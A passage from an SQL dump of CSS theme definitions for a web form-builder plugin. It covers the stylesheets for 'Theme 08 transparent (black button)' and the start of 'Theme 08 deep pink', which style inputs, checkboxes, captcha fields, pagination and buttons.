{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type="password"] {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F1F1F1;\r\n	border: 1px solid transparent;\r\ncolor: #696969;\r\n}\r\ninput[type="text"]:focus{\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus{\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #A7A7A7;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: " ";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #A7A7A7;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #A8A8A8;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	color: #E6C18B;\r\n	background-color: #ECEBEB;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding-top: 5px;\r\n	padding: 5px 25px 0px 25px;\r\n	font-size: 12px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #E6C18B;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 25px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 30px 0px 30px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 18px;\r\n	line-height: 18px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	background: #F3CC92 ; /* Old browsers */\r\n	background: -moz-linear-gradient(left, #F3CC92 0%, #F3CC92 39%, #F5CB8F 100%); /* FF3.6+ */\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #F3CC92 ), color-stop(39%, #F3CC92 ), color-stop(100%, #F5CB8F )); /* Chrome,Safari4+ */\r\n	background: -webkit-linear-gradient(left, #F3CC92 0%, #F3CC92 39%, #F5CB8F 100%); /* Chrome10+,Safari5.1+ */\r\n	background: -o-linear-gradient(left, #F3CC92 0%, #F3CC92 39%, #F5CB8F 100%); /* Opera 11.10+ */\r\n	background: -ms-linear-gradient(left, #F3CC92 0%, #F3CC92 39%, #F5CB8F 100%); /* IE10+ */\r\n	background: linear-gradient(to right, #F3CC92 0%, #F3CC92 39%, #F5CB8F 100%); /* W3C */\r\n	vertical-align: middle;\r\n}\r\n.page_percentage_deactive {\r\n	height: 18px;\r\n	line-height: 20px;\r\n	background-color: #EBEAEA;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: center!important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_page_navigation:after {\r\n	content: " ";\r\n	display: block;\r\n	height: 9px;\r\n	background: url([SITE_ROOT]/images/07/0.png) no-repeat;\r\n	position: relative;\r\n	background-size: cover;\r\n	top: -9px;\r\n}\r\n.wdform_percentage_text {\r\n	margin-right:9px;\r\n	color: #FFFFFF;\r\n	font-weight: normal;\r\n	font-size: 13px;\r\n	position: relative;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n', 0),
(28, 'Theme 08 transparent (black button)', '.radio-div input[type="radio"],\r\n.checkbox-div input[type="checkbox"]\r\n{\r\nvisibility: hidden;\r\n}\r\n.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #000000;\r\nmargin-bottom: 10px;\r\ncolor: #000000;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\na.ui-spinner-button\r\n{\r\nbackground:none !important;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #E9E9E9;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n	color: #414141;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 0px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\n\r\n\r\n.ui-slider-range {\r\n	background: #8A8A8A !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #fff;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 1px solid #EEEEEE !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	border-radius: 0px;\r\n	padding: 0px 0px 0px 2px;\r\n	font-size: 13px;\r\n	height: 22px;\r\n	line-height: 22px;\r\n	overflow: hidden;\r\n	background: #F8F8F8;\r\n	border: 0px solid #D3D3D3;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 23px;\r\n	width: 30px;\r\n	background: url([SITE_ROOT]/images/08/01.png) 50% 50% no-repeat;\r\n	position: absolute;\r\n	top: 0px;\r\n	right: 0px;\r\n	padding: 0px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text] {\r\n	margin: 0px;\r\n}\r\ninput[type=password] {\r\n	margin: 0px;\r\n}\r\ninput[type=url] {\r\n	margin: 0px;\r\n}\r\ninput[type=email] {\r\n	margin: 0px;\r\n}\r\ninput.text {\r\n	margin: 0px;\r\n}\r\ninput.title {\r\n	margin: 0px;\r\n}\r\ntextarea {\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	position: absolute;\r\n	border-radius: 0px;\r\n	height: 23px;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	}\r\n.file-picker {\r\n	width: 71px;\r\n	height: 32px;\r\n	background: url([SITE_ROOT]/images/07/upload.png);\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/08/next.png) no-repeat right;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n        border: 1px solid #CECECE;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: url([SITE_ROOT]/images/08/previous.png) no-repeat left;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #CECECE;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #000;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n		border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.button-reset {\r\n	color: #787878;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	min-width: 80px;\r\n	min-height: 35px;\r\n	font-family: Segoe UI;\r\n	float: right;\r\n	border: 1px solid transparent;\r\n	margin: 5px;\r\n}\r\n.wdform_page {\r\n	background: transparent;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	padding-right: 50px !important;\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_section_break2 {\r\n	color: #000000;\r\n	display: inline-block;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n.wdform_section_break \r\n{\r\n	color: #000000;\r\n	text-align: left;\r\n	font-size: 23px;\r\nmargin: 16px 0px;\r\n}\r\n\r\n\r\n.wdform_section {\r\n	display: inline-block;\r\n}\r\nselect {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nbackground: #F8F8F8;\r\nborder: 0px solid #fff;\r\ncolor: #414141;\r\n	outline: none;\r\n}\r\n\r\ninput[type="text"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F0F0F0;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ninput[type="password"]{\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F0F0F0;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ntextarea {\r\n	border-radius: 0px;\r\n	height: 22px;\r\n	padding:0 3px !important;\r\n	background: #F0F0F0;\r\nborder:0px solid #fff;\r\ncolor: #414141;\r\n}\r\ninput[type="text"]:focus {\r\n	outline: none;\r\n}\r\ninput[type="password"]:focus {\r\n	outline: none;\r\n}\r\ntextarea:focus {\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #000;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\ncursor: pointer;\r\n-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\nfilter: alpha(opacity=0);\r\nopacity: 0;\r\ncontent: "";\r\nposition: absolute;\r\nwidth: 13px;\r\nheight: 9px;\r\nbackground: url([SITE_ROOT]/images/08/checkbox.png) no-repeat;\r\nborder-radius: 0px;\r\ntop: 1px;\r\nleft: 2px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/03/date.png) no-repeat !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 22px;\r\n	height: 22px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #000000;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n	top: 2px;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=0)";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: "";\r\n	position: absolute;\r\n	width: 9px;\r\n	height: 8px;\r\n	background: #000000;\r\n	border-radius: 0px;\r\n	top: 2px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=30)";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: "progid:DXImageTransform.Microsoft.Alpha(Opacity=100)" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #000;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: "Lucida Grande", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #8A8A8A;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #000;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n	border-radius: 0px;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\ncolor: #CDCDCD;\r\nbackground-color: #F8F8F8;\r\ncursor: pointer;\r\ndisplay: inline-block;\r\nheight: 27px;\r\ntext-align: center;\r\nvertical-align: bottom;\r\npadding: 5px 25px 0px 25px;\r\nfont-size: 18px;\r\nmargin-right:3px;\r\nmargin-bottom:3px;\r\nfont-weight: bold;\r\n}\r\n.page_active {\r\n	color: #000;\r\ncursor: pointer;\r\nbackground-color: #FFFFFF;\r\ndisplay: inline-block;\r\nvertical-align: bottom;\r\nheight: 29px;\r\ntext-align: center;\r\nfont-size: 22px;\r\npadding: 5px 25px 0px 25px;\r\nborder: 1px solid #EEEEEE;\r\nfont-weight: bold;\r\nmargin-right:3px;\r\nborder-bottom: none;\r\nline-height: 26px;\r\n}\r\n.page_percentage_active {\r\npadding: 0px;\r\nmargin: 1px;\r\nborder-spacing: 0px;\r\nheight: 21px;\r\nline-height: 20px;\r\nfont-size: 15px;\r\nfloat: left;\r\ntext-align: right !important;\r\nz-index: 1;\r\nposition: relative;\r\nbackground: #000;\r\n}\r\n.page_percentage_deactive {\r\n	height: 24px;\r\nline-height: 20px;\r\nbackground-color: #FFFFFF;\r\ntext-align: left !important;\r\nmargin: 0 5px;\r\nborder: 1px solid #EEEEEE;\r\ndisplay: inline-block;\r\nwidth: 98%;\r\nborder-bottom: none;\r\n\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: right !important;\r\n	margin-bottom: -1px;\r\n}\r\n\r\n.wdform_percentage_text {\r\n	color: #FFF;\r\n	font-weight: bold;\r\n	font-size: 13px;\r\n	position: relative;\r\n}\r\n.wdform_percentage_title {\r\n	color: #000000;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 20px;\r\n	height: 20px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #4D792C;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 0px;\r\n	min-width: 80px;\r\n	min-height: 31px;\r\n	color: #fff;\r\n	border: 2px solid #68943B;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}', 0),
(29, 'Theme 08 deep pink', '.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #F0EFEF;\r\nborder: 1px solid #930049;\r\nmargin-bottom: 10px;\r\ncolor: #930049;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\nwidth: 13px;\r\nheight: 13px;\r\ntop: -4px;\r\nborder: 0px;\r\nborder-radius: 13px;\r\nbackground: #FAFAFA;\r\nborder: 3px solid #B1B1B1;\r\noutline: none;\r\n}\r\na.ui-spinner-button\r\n{\r\nbackground:none !important;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: #F5F5F5 !important;\r\n	margin: 7px 0px;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type="text"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: 